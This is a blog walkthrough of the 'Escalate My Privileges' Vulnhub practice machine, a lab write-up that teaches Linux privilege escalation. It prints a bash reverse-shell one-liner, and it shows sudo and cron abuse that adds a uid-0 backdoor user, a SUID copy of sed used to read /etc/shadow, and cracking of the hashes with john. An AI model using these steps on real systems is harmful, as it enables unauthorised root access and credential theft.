{"id":26054,"date":"2020-04-22T02:01:07","date_gmt":"2020-04-21T20:31:07","guid":{"rendered":"https:\/\/www.armourinfosec.com\/?p=26054"},"modified":"2020-05-17T10:19:33","modified_gmt":"2020-05-17T04:49:33","slug":"escalate-my-privileges-vulnhub-walkthrough","status":"publish","type":"post","link":"https:\/\/www.armourinfosec.com\/escalate-my-privileges-vulnhub-walkthrough\/","title":{"rendered":"Escalate My Privileges Vulnhub Walkthrough"},"content":{"rendered":"<p>Here&#8217;s another article on <a href=\"https:\/\/www.vulnhub.com\/entry\/escalate-my-privileges-1,448\/\">Escalate My Privileges Vulnhub Walkthrough<\/a> designed by <a href=\"https:\/\/twitter.com\/akankshavermasv\">Akanksha Sachin Verma<\/a> for learning Linux Privilege Escalation skills. The box is specially designed for learning and sharpening Linux Privilege Escalation skills. There are several ways of playing with privileges. The goal is to First get the User of the Target then Start Playing with Privileges. Again this blog &#8220;Escalate My Privileges Vulnhub Walkthrough&#8221; is written by <a href=\"https:\/\/twitter.com\/Dasagreeva1\">Ritik Kumar Jain<\/a>. So let us get starting.<\/p>\n<h3><img decoding=\"async\" class=\"alignnone wp-image-26055 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-03-10-41-44.png\" alt=\"\" width=\"803\" height=\"599\" \/><\/h3>\n<h3>Methodology :<\/h3>\n<h5>Network Scanning<\/h5>\n<ul>\n<li>Netdiscover<\/li>\n<li>Nmap<\/li>\n<\/ul>\n<h5>Enumeration<\/h5>\n<ul>\n<li>Nikto<\/li>\n<li>Netcat payload<\/li>\n<\/ul>\n<h5>Privilege Escalation<\/h5>\n<ul>\n<li>sudo-l<\/li>\n<li>crontab<\/li>\n<li>setuid<\/li>\n<li>password cracking<\/li>\n<li>normal guessing<\/li>\n<\/ul>\n<h3>NETWORK SCANNING:<\/h3>\n<p>We start with obtaining the IP address of the machine. So I used netdiscover for the scanning. And my IP is: <strong>192.168.2.10<\/strong><\/p>\n<pre class=\"toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true\">#netdiscover -i vboxnet0\r\nCurrently scanning: 192.168.17.0\/16 | Screen View: Unique Hosts\r\n2 Captured ARP Req\/Rep packets, from 2 hosts. Total size: 102\r\n_____________________________________________________________________________\r\nIP At        MAC Address      Count Len MAC Vendor \/ Hostname\r\n-----------------------------------------------------------------------------\r\n192.168.2.2  08:00:27:df:0c:9c 1     42 PCS Systemtechnik GmbH\r\n192.168.2.10 08:00:27:50:8c:dd 1     60 PCS Systemtechnik GmbH<\/pre>\n<p>We are scanning our local network. And for that, we are using the Nmap ping scan.<\/p>\n<pre class=\"toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true\">nmap -A -sS -p- -O 192.168.2.10\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-04-22 01:37 IST\r\nNmap scan report for 192.168.2.10\r\nHost is up (0.00056s latency).\r\nNot shown: 65526 filtered ports\r\nPORT      STATE  SERVICE VERSION\r\n22\/tcp    open   ssh     OpenSSH 7.4 (protocol 2.0)\r\n| ssh-hostkey: \r\n|   2048 61:16:10:91:bd:d7:6c:06:df:a2:b9:b5:b9:3b:dd:b6 (RSA)\r\n|   256 0e:a4:c9:fc:de:53:f6:1d:de:a9:de:e4:21:34:7d:1a (ECDSA)\r\n|_  256 ec:27:1e:42:65:1c:4a:3b:93:1c:a1:75:be:00:22:0d (ED25519)\r\n80\/tcp    open   http    Apache httpd 2.4.6 ((CentOS) PHP\/5.4.16)\r\n| http-methods: \r\n|_  Potentially risky methods: TRACE\r\n| http-robots.txt: 1 disallowed entry \r\n|_\/phpbash.php\r\n|_http-server-header: Apache\/2.4.6 (CentOS) PHP\/5.4.16\r\n|_http-title: Check your Privilege\r\n111\/tcp   open   rpcbind 2-4 (RPC #100000)\r\n| rpcinfo: \r\n|   program version    port\/proto  service\r\n|   100227  3           2049\/tcp   nfs_acl\r\n|   100227  3           2049\/tcp6  nfs_acl\r\n|   100227  3           2049\/udp   nfs_acl\r\n|_  100227  3           2049\/udp6  nfs_acl\r\n875\/tcp   closed unknown\r\n2049\/tcp  open   nfs_acl 3 (RPC #100227)\r\n20048\/tcp open   mountd  1-3 (RPC #100005)\r\n42955\/tcp closed unknown\r\n46666\/tcp closed unknown\r\n54302\/tcp closed unknown\r\nMAC Address: 08:00:27:50:8C:DD (Oracle VirtualBox virtual NIC)\r\nDevice type: general purpose\r\nRunning: Linux 3.X|4.X\r\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\r\nOS details: Linux 3.2 - 4.9\r\n<\/pre>\n<p>So far so good. We gat a port 80. So let get enumerating it more.<\/p>\n<h3>Enumeration<\/h3>\n<p>And I open the target IP address our browser. As we see an image file<\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-26056 size-large\" title=\"Escalate My Privileges Vulnhub Walkthrough\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-03-10-52-43-1024x522.png\" alt=\"Escalate My Privileges Vulnhub Walkthrough\" width=\"1024\" height=\"522\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-03-10-52-43-1024x522.png 1024w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-03-10-52-43-300x153.png 300w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-03-10-52-43-768x391.png 768w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-03-10-52-43.png 1342w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p>So I open the next page \/phpbash.php because we see the file in Nmap output robots.txt file. As disallow entry here we see a bash terminal.<\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-26057\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-03-10-53-20.png\" alt=\"\" width=\"400\" height=\"159\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-03-10-53-20.png 323w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-03-10-53-20-300x119.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" \/><\/p>\n<p>So I run the id command and we see an output apache group name.<\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-26058 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-03-10-56-35.png\" alt=\"\" width=\"918\" height=\"186\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-03-10-56-35.png 918w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-03-10-56-35-300x61.png 300w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-03-10-56-35-768x156.png 768w\" sizes=\"(max-width: 918px) 100vw, 918px\" \/><\/p>\n<p>And now without wasting our time. I create an oneliner bash reverse shell and start our Netcat payload listener port 1505. So that I can get the shell.<\/p>\n<pre class=\"toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true\">bash -i &gt;&amp; \/dev\/tcp\/192.168.2.1\/1505 0&gt;&amp;1 \r\n\r\n#nc -nlvp 1505\r\nlistening on [any] 1505 ...\r\nconnect to [192.168.2.1] from (UNKNOWN) [192.168.2.10] 51562\r\nbash: no job control in this shell\r\nbash-4.2$ id \r\nid \r\nuid=48(apache) gid=48(apache) groups=48(apache)\r\nbash-4.2$ hostname\r\nhostname\r\nmy_privilege\r\nbash-4.2$ uname -a\r\nuname -a\r\nLinux my_privilege 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU\/Linux\r\n<\/pre>\n<p>We get a shell.<\/p>\n<h3>Privilege Escalation<\/h3>\n<p>On the further enumerating the user home directory and we can see a user armour. And on <strong>armour<\/strong> user home directory we find a <strong>credentials.txt<\/strong> file. So I am using the cat command to open the file and we see a message my password is md5 (rootroot1).<\/p>\n<pre class=\"toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true\">bash-4.2$ cd \/home\r\nbash-4.2$ ls\r\narmour\r\nbash-4.2$ cd armour\r\nbash-4.2$ ls\r\nCredentials.txt  backup.sh  runme.sh\r\nbash-4.2$ ls -lha\r\ntotal 24K\r\ndrwxrwxrwx  3 armour armour 121 Mar 21 07:59 .\r\ndrwxr-xr-x. 3 root   root    19 Apr 11  2018 ..\r\n-rwxrwxrwx  1 armour armour 123 Mar 19 08:19 .bash_history\r\n-rwxrwxrwx  1 armour armour  27 Mar 17 10:34 .bashrc\r\ndrwxrwxrwx  3 armour armour  18 Mar 17 10:27 .local\r\n-rwxrwxrwx  1 root   armour 603 Mar 17 10:30 .viminfo\r\n-rw-r--r--  1 armour armour  30 Mar 21 07:59 Credentials.txt\r\n-rwxrwxrwx  1 root   root    17 Mar 17 09:48 backup.sh\r\n-rwxrwxrwx  1 root   root     8 Mar 17 10:55 runme.sh\r\nbash-4.2$ cat Credentials.txt \r\nmy password is\r\nmd5(rootroot1) &gt;&gt;&gt; b7bc8489abe360486b4b19dbc242e885\r\nbash-4.2$<\/pre>\n<p>So I am changing our user to armour using SU ( Switch User ) command and we successfully changed our user.<\/p>\n<pre class=\"toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true\">bash-4.2$ su armour\r\nsu armour\r\nPassword: b7bc8489abe360486b4b19dbc242e885\r\n\r\n[armour@my_privilege html]$ id \r\nid \r\nuid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)\r\n[armour@my_privilege html]$ hostname\r\nhostname\r\nmy_privilege\r\n[armour@my_privilege html]$<\/pre>\n<p>Now there are many ways to get escalated<\/p>\n<p>METHOD 1: SUDO-L<\/p>\n<p>So sudo -l prints the commands which we are allowed to run as SUDO. And if the attacker can&#8217;t directly get root access via any other technique. So he might try to compromise any of the users who have SUDO access.<\/p>\n<pre class=\"toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true\">[armour@my_privilege html]$ sudo -l\r\nMatching Defaults entries for armour on my_privilege:\r\n    requiretty, !visiblepw, always_set_home, env_reset, env_keep=\"COLORS\r\n    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS\", env_keep+=\"MAIL PS1\r\n    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE\", env_keep+=\"LC_COLLATE\r\n    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES\", env_keep+=\"LC_MONETARY\r\n    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE\", env_keep+=\"LC_TIME LC_ALL\r\n    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY\", env_keep+=LD_PRELOAD,\r\n    secure_path=\/sbin\\:\/bin\\:\/usr\/sbin\\:\/usr\/bin\r\nUser armour may run the following commands on my_privilege:\r\n    (ALL : ALL) NOPASSWD: \/bin\/sh, \/bin\/bash, \/usr\/bin\/sh, \/usr\/bin\/bash,\/bin\/tcsh, \/bin\/csh, \/bin\/ksh, \/bin\/rksh, \/bin\/zsh, \/usr\/bin\/fish,\r\n        \/bin\/dash, \/usr\/bin\/tmux, \/usr\/bin\/rsh, \/bin\/rc, \/usr\/bin\/rc,\/usr\/bin\/rssh, \/usr\/bin\/scponly, \/bin\/scponly, \/usr\/bin\/rootsh,\r\n        \/usr\/bin\/shc, \/usr\/bin\/shtool, \/usr\/bin\/targetcli, \/usr\/bin\/nano,\/usr\/bin\/rnano, \/usr\/bin\/awk, \/usr\/bin\/dgawk, \/usr\/bin\/gawk,\r\n        \/usr\/bin\/igawk, \/usr\/bin\/pgawk, \/usr\/bin\/curl, \/bin\/ed, \/bin\/red,\/usr\/bin\/env, \/usr\/bin\/cat, \/usr\/bin\/chcon, \/usr\/bin\/chgrp,\r\n        \/usr\/bin\/chmod, \/usr\/bin\/chown, \/usr\/bin\/cp, \/usr\/bin\/cut, \/usr\/bin\/dd,\/usr\/bin\/head, \/usr\/bin\/ln, \/usr\/bin\/mv, \/usr\/bin\/nice, \/usr\/bin\/tail,\r\n        \/usr\/bin\/uniq, \/usr\/bin\/ftp, \/usr\/bin\/pftp, \/usr\/bin\/zip,\/usr\/bin\/zipcloak, \/usr\/bin\/zipnote, \/usr\/bin\/zipsplit,\r\n        \/usr\/bin\/funzip, \/usr\/bin\/unzip, \/usr\/bin\/unzipsfx, \/usr\/bin\/zipgrep,\/usr\/bin\/zipinfo, \/usr\/bin\/7za, \/usr\/bin\/socat, \/usr\/bin\/php,\r\n        \/usr\/bin\/git, \/usr\/bin\/rvim, \/usr\/bin\/rvim, \/usr\/bin\/vim,usr\/bin\/vimdiff, \/usr\/bin\/vimtutor, \/usr\/bin\/vi, \/bin\/sed,\r\n        \/usr\/bin\/qalc, \/usr\/bin\/e3, \/usr\/bin\/dex, \/usr\/bin\/elinks,\/usr\/bin\/scp, \/usr\/bin\/sftp, \/usr\/bin\/ssh, \/usr\/bin\/gtar, \/usr\/bin\/tar,\r\n        \/usr\/bin\/rpm, \/usr\/bin\/up2date, \/usr\/bin\/yum, \/usr\/bin\/expect,\/usr\/bin\/find, \/usr\/bin\/less, \/usr\/bin\/more, \/usr\/bin\/perl,\r\n        \/usr\/bin\/python, \/usr\/bin\/man, \/usr\/bin\/tclsh, \/usr\/bin\/script,\/usr\/bin\/nmap, \/usr\/bin\/nmap, \/usr\/bin\/aria2c, \/usr\/sbin\/arp,\r\n        \/usr\/bin\/base64, \/usr\/bin\/busybox, \/usr\/bin\/cpan, \/usr\/bin\/cpulimit,\/usr\/bin\/crontab, \/usr\/bin\/date, \/usr\/bin\/diff, \/usr\/bin\/dmesg,\r\n        \/usr\/sbin\/dmsetup, \/usr\/bin\/dnf, \/usr\/bin\/docker,\/usr\/bin\/easy_install, \/usr\/bin\/emacs, \/usr\/bin\/expand,\r\n        \/usr\/bin\/facter, \/usr\/bin\/file, \/usr\/bin\/finger, \/usr\/bin\/flock,\/usr\/bin\/fmt, \/usr\/bin\/fold, \/usr\/bin\/gdb, \/usr\/bin\/gimp,\r\n        \/usr\/bin\/grep, \/usr\/bin\/head, \/usr\/sbin\/iftop, \/usr\/bin\/ionice,\/usr\/sbin\/ip, \/usr\/bin\/irb, \/usr\/bin\/jjs, \/usr\/bin\/journalctl,\r\n        \/usr\/bin\/jq, \/usr\/sbin\/ldconfig, \/usr\/sbin\/logsave, \/usr\/bin\/ltrace,\/usr\/bin\/lua, \/usr\/bin\/mail, \/usr\/bin\/make, \/usr\/bin\/mawk,\r\n        \/usr\/bin\/mount, \/usr\/sbin\/mtr, \/usr\/bin\/mysql, \/usr\/bin\/nawk,\/usr\/bin\/ncat, \/usr\/bin\/nl, \/usr\/bin\/node, \/usr\/bin\/od,\r\n        \/usr\/bin\/openssl, \/usr\/bin\/perl, \/usr\/bin\/pic, \/usr\/bin\/pip,\/usr\/bin\/puppet, \/usr\/bin\/readelf, \/usr\/bin\/red, \/usr\/bin\/rlwrap,\r\n        \/usr\/bin\/rpmquery, \/usr\/bin\/rsync, \/usr\/bin\/ruby, \/usr\/bin\/run-parts,\/usr\/bin\/screen, \/usr\/bin\/sed, \/usr\/sbin\/service, \/usr\/bin\/setarch,\r\n        \/usr\/bin\/sftp, \/usr\/bin\/shuf, \/usr\/bin\/smbclient, \/usr\/bin\/socat,\/usr\/bin\/sort, \/usr\/bin\/sqlite3, \/usr\/bin\/stdbuf, \/usr\/bin\/strace,\r\n        \/usr\/bin\/systemctl, \/usr\/bin\/taskset, \/usr\/bin\/tclsh,\/usr\/sbin\/tcpdump, \/usr\/bin\/tee, \/usr\/bin\/telnet, \/usr\/bin\/tftp,\r\n        \/usr\/bin\/time, \/usr\/bin\/timeout, \/usr\/bin\/top, \/usr\/bin\/ul,\/usr\/bin\/unexpand, \/usr\/bin\/unshare, \/usr\/bin\/watch, \/usr\/bin\/wget,\r\n        \/usr\/bin\/xargs, \/usr\/bin\/xxd, \/script\/test.sh, \/script\/test.py,\/sbin\/httpd, \/usr\/sbin\/setcap, \/usr\/sbin\/getcap, \/usr\/local\/bin\/ht,\r\n        \/bin\/timedatectl, \/home\/armour\/ai, \/usr\/bin\/user_hello\r\n\r\n[armour@my_privilege html]$ sudo \/bin\/bash\r\nsudo \/bin\/bash\r\n[root@my_privilege html]# id\r\nid\r\nuid=0(root) gid=0(root) groups=0(root)\r\n\r\n[armour@my_privilege html]$ sudo \/usr\/bin\/user_hello \r\nroot\r\n[armour@my_privilege html]$ vim \/usr\/bin\/user_hello \r\n[armour@my_privilege html]$ cat \/usr\/bin\/user_hello \r\n#!\/bin\/bash\r\nbash -i\r\n[armour@my_privilege html]$ sudo \/usr\/bin\/us\r\nuser_hello   users        usleep       usx2yloader  \r\n[armour@my_privilege html]$ sudo \/usr\/bin\/user_hello \r\n[root@my_privilege html]# id \r\nuid=0(root) gid=0(root) groups=0(root)\r\n\r\n\r\n<\/pre>\n<p>METHOD 2: CRONTAB<\/p>\n<p>Corn jobs generally run with root privileges. And if we can successfully tamper any script or binary which are defined in the corn jobs. So then we can easily execute arbitrary code with root privilege.<\/p>\n<pre class=\"toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true\">[armour@my_privilege tmp]$ cat \/etc\/crontab \r\nSHELL=\/bin\/bash\r\nPATH=\/sbin:\/bin:\/usr\/sbin:\/usr\/bin:\/home\/armour\r\n\r\n# For details see man 4 crontabs\r\n\r\n# Example of job definition:\r\n# .---------------- minute (0 - 59)\r\n# |  .------------- hour (0 - 23)\r\n# |  |  .---------- day of month (1 - 31)\r\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\r\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\r\n# |  |  |  |  |\r\n# *  *  *  *  * user-name  command to be executed\r\n  *  *  *  *  * root backup.sh\r\n  *  *  *  *  * root run.sh\r\n  *  *  *  *  * root \/opt\/my_script.sh\r\n  *  *  *  *  * root \/opt\/my_backup.sh\r\n  0  0  1  1  * root \/opt\/new_year.sh\r\n  *  *  *  *  * root \/usr\/bin\/bash \/script\/*.sh\r\n  *  *  *  *  * root \/usr\/bin\/tar czf \/backup\/armour\/`date \"+\\%F-\\%H-\\%M\"`.tar.gz \/home\/armour\/*\r\n[armour@my_privilege tmp]$ cd \r\n[armour@my_privilege ~]$ ls -lh \r\ntotal 12K\r\n-rw-r--r-- 1 armour armour 30 Mar 21 07:59 Credentials.txt\r\n-rwxrwxrwx 1 root   root   63 Apr  3 06:57 backup.sh\r\n-rwxrwxrwx 1 root   root    8 Mar 17 10:55 runme.sh\r\n[armour@my_privilege ~]$ vim backup.sh \r\n[armour@my_privilege ~]$ openssl passwd 123       \r\nlp7umJWRYHRcM\r\n[armour@my_privilege ~]$ vim backup.sh \r\n[armour@my_privilege ~]$ cat backup.sh \r\n#!\/bin\/bash\r\n\/usr\/sbin\/useradd dasagreeva -u 0 -o -p lp7umJWRYHRcM\r\n[armour@my_privilege ~]$ cat \/etc\/passwd\r\nroot:x:0:0:root:\/root:\/bin\/bash\r\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\r\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\r\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\r\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\r\nsync:x:5:0:sync:\/sbin:\/bin\/sync\r\narmour:x:1000:1000::\/home\/armour:\/bin\/bash\r\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\r\nrpcuser:x:29:29:RPC Service User:\/var\/lib\/nfs:\/sbin\/nologin\r\nnfsnobody:x:65534:65534:Anonymous NFS User:\/var\/lib\/nfs:\/sbin\/nologin\r\nnginx:x:995:990:Nginx web server:\/opt\/rh\/nginx16\/root\/var\/lib\/nginx:\/sbin\/nologin\r\nmysql:x:994:989:MySQL server:\/var\/lib\/mysql:\/bin\/bash\r\nexim:x:31:31:Exim Daemon:\/dev\/null:\/bin\/false\r\ndasagreeva:x:0:1001::\/home\/dasagreeva:\/bin\/bash\r\n[armour@my_privilege ~]$ su dasagreeva\r\nPassword: \r\n[root@my_privilege armour]# id\r\nuid=0(root) gid=1001(dasagreeva) groups=1001(dasagreeva)\r\n<\/pre>\n<p>METHOD 3:Exploiting SUID Executables<\/p>\n<p>SUID which stands for set user ID is a Linux feature that allows users to execute a file with the permissions of a specified user. UID is a feature that, when used properly, actually enhances Linux security. The problem is that administrators may unknowingly introduce dangerous SUID configurations when they install third-party applications or make logical configuration changes.<\/p>\n<pre class=\"toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true\">[armour@my_privilege html]$ find \/ -perm -u=s -type f 2&gt;\/dev\/null \r\n\/var\/www\/html\/awk\r\n\/var\/www\/html\/sed\r\n\/usr\/bin\/sed\r\n\/usr\/bin\/curl\r\n\/usr\/bin\/pic\r\n\/usr\/bin\/chage\r\n\/usr\/bin\/gpasswd\r\n\/usr\/bin\/newgrp\r\n\/usr\/bin\/rpm\r\n\/usr\/bin\/mount\r\n\/usr\/bin\/chfn\r\n\/usr\/bin\/chsh\r\n\/usr\/bin\/su\r\n\/usr\/bin\/umount\r\n\/usr\/bin\/python2.7\r\n\/usr\/bin\/pkexec\r\n\/usr\/bin\/crontab\r\n\/usr\/bin\/passwd\r\n\/usr\/bin\/shc\r\n\/usr\/bin\/shtool\r\n\/usr\/bin\/targetcli\r\n\/usr\/bin\/rlwrap\r\n\/usr\/bin\/scponly\r\n\/usr\/bin\/qalc\r\n\/usr\/bin\/irb\r\n\/usr\/bin\/tclsh8.5\r\n\/usr\/bin\/expect\r\n\/usr\/bin\/zipcloak\r\n\/usr\/bin\/zipnote\r\n\/usr\/bin\/zipsplit\r\n\/usr\/bin\/funzip\r\n\/usr\/bin\/unzipsfx\r\n\/usr\/bin\/zipgrep\r\n\/usr\/bin\/zipinfo\r\n\/usr\/bin\/jq\r\n\/usr\/bin\/ltrace\r\n\/usr\/bin\/mailx\r\n\/usr\/bin\/busybox\r\n\/usr\/bin\/mawk\r\n\/usr\/bin\/cpulimit\r\n\/usr\/bin\/puppet\r\n\/usr\/bin\/smbclient\r\n\/usr\/bin\/strace\r\n\/usr\/bin\/user_hello\r\n\/usr\/bin\/fusermount\r\n\/usr\/sbin\/ldconfig\r\n\/usr\/sbin\/pam_timestamp_check\r\n\/usr\/sbin\/unix_chkpwd\r\n\/usr\/sbin\/arp\r\n\/usr\/sbin\/dmsetup\r\n\/usr\/sbin\/service\r\n\/usr\/sbin\/usernetctl\r\n\/usr\/sbin\/iftop\r\n\/usr\/sbin\/exim-4.84-3\r\n\/usr\/sbin\/mtr\r\n\/usr\/sbin\/ifconfig\r\n\/usr\/sbin\/mount.nfs\r\n\/usr\/lib\/polkit-1\/polkit-agent-helper-1\r\n\/usr\/libexec\/git-core\/git-mktag\r\n\/usr\/libexec\/git-core\/git-mktree\r\n\/usr\/libexec\/git-core\/git-mv\r\n\/usr\/libexec\/git-core\/git-name-rev\r\n\/usr\/libexec\/git-core\/git-notes\r\n\/usr\/libexec\/git-core\/git-pack-objects\r\n\/usr\/libexec\/git-core\/git-pack-redundant\r\n\/usr\/libexec\/git-core\/git-pack-refs\r\n\/usr\/libexec\/git-core\/git-replace\r\n\/usr\/libexec\/git-core\/git-patch-id\r\n\/usr\/libexec\/git-core\/git-add\r\n\/usr\/libexec\/git-core\/git-annotate\r\n\/usr\/libexec\/git-core\/git-apply\r\n\/usr\/libexec\/git-core\/git-archive\r\n\/usr\/libexec\/git-core\/git-bisect--helper\r\n\/usr\/libexec\/git-core\/git-blame\r\n\/usr\/libexec\/git-core\/git-branch\r\n\/usr\/libexec\/git-core\/git-bundle\r\n\/usr\/libexec\/git-core\/git-cat-file\r\n\/usr\/libexec\/git-core\/git-check-attr\r\n\/usr\/libexec\/git-core\/git-check-ignore\r\n\/usr\/libexec\/git-core\/git-check-ref-format\r\n\/usr\/libexec\/git-core\/git-checkout\r\n\/usr\/libexec\/git-core\/git-checkout-index\r\n\r\n[armour@my_privilege html]$ sudo sh -c 'cp $(which sed) .; chmod +s .\/sed'\r\n[armour@my_privilege html]$ .\/sed -e '' \"\/etc\/shadow\"\r\nroot:$6$lYoxb\/H\/0LQ5d50Q$mM2ej4Um6zmkg11uszJrBpZo\/vI4TT6nEvQnlnI\/GlB9otfNIyN9xXfATAxVAUzj4ojTE1pmFbY12NUzw2j\/b0:18313:0:99999:7:::\r\nbin:*:16372:0:99999:7:::\r\ndaemon:*:16372:0:99999:7:::\r\nadm:*:16372:0:99999:7:::\r\nlp:*:16372:0:99999:7:::\r\nsync:*:16372:0:99999:7:::\r\nshutdown:*:16372:0:99999:7:::\r\nhalt:*:16372:0:99999:7:::\r\nmail:*:16372:0:99999:7:::\r\noperator:*:16372:0:99999:7:::\r\ngames:*:16372:0:99999:7:::\r\nftp:*:16372:0:99999:7:::\r\ntcpdump:!!:18319::::::\r\narmour:$6$ibscpEYi$A0bt4lJe4NdD8hqG6KrZs.I7nS6chM1mMP\/6LtG\/DlMQ30W8aQDSr9uM42jI8bGoEZCWUr87aalTQrkioxxQg\/:18340:0:99999:7:::\r\nmysql:!!:18337::::::\r\nexim:!!:18339:0:99999:7:::\r\ndasagreeva:lp7umJWRYHRcM:18355:0:99999:7:::\r\n[armour@my_privilege html]$ \r\n\r\n<\/pre>\n<p>We can now see the shadow file of the box.<\/p>\n<p>METHOD 4: Password cracking<\/p>\n<p>We are going to crack the password to the root user form shadow file. For that, we must be needing <strong>shadow file <\/strong>and <strong>passwd file <\/strong>in text form.<\/p>\n<pre class=\"toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true\">#cd emp\/\r\n#ls\r\npasswd.txt  shadow.txt\r\n#unshadow passwd.txt shadow.txt &gt; password.txt\r\n#john --wordlist=\/usr\/share\/wordlists\/rockyou.txt password.txt\r\nWarning: only loading hashes of type \"sha512crypt\", but also saw type \"descrypt\"\r\nUse the \"--format=descrypt\" option to force loading hashes of that type instead\r\nUsing default input encoding: UTF-8\r\nLoaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256\/256 AVX2 4x])\r\nCost 1 (iteration count) is 5000 for all loaded hashes\r\nWill run 2 OpenMP threads\r\nPress 'q' or Ctrl-C to abort, almost any other key for status\r\nWarning: Only 3 candidates left, minimum 8 needed for performance.\r\nrootroot1        (root)\r\n1g 0:00:00:00 DONE (2020-04-22 14:15) 25.00g\/s 75.00p\/s 150.0c\/s 150.0C\/s \r\nUse the \"--show\" option to display all of the cracked passwords reliably\r\nSession completed\r\n<\/pre>\n<p>METHOD 5: Guessing<\/p>\n<p>And so the last but not the least password guessing is the one more way to go<\/p>\n<pre class=\"toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true\">bash-4.2$ su root \r\nsu root \r\nPassword: rootroot1\r\nid \r\nuid=0(root) gid=0(root) groups=0(root)\r\ncd \/root\r\nls \r\nproof.txt\r\ncat proof.txt\r\nBest of Luck\r\n628435356e49f976bab2c04948d22fe4\r\n<\/pre>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Here&#8217;s another article on Escalate My Privileges Vulnhub Walkthrough designed by Akanksha Sachin Verma for learning Linux Privilege Escalation skills&#8230;.<\/p>\n","protected":false},"author":1,"featured_media":26056,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[107],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.0 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Escalate My Privileges Vulnhub Walkthrough - Armour Infosec<\/title>\n<meta name=\"description\" content=\"Here&#039;s the another article on Escalate My Privileges Vulnhub Walkthrough designed by Akanksha Sachin Verma for learning Linux Privilege Escalation skills.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.armourinfosec.com\/escalate-my-privileges-vulnhub-walkthrough\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Escalate My Privileges Vulnhub Walkthrough - Armour Infosec\" \/>\n<meta property=\"og:description\" content=\"Here&#039;s the another article on Escalate My Privileges Vulnhub Walkthrough designed by Akanksha Sachin Verma for learning Linux Privilege Escalation skills.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.armourinfosec.com\/escalate-my-privileges-vulnhub-walkthrough\/\" \/>\n<meta property=\"og:site_name\" content=\"Armour Infosec\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/ArmourInfosec\" \/>\n<meta property=\"article:published_time\" content=\"2020-04-21T20:31:07+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-05-17T04:49:33+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-03-10-52-43.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1342\" 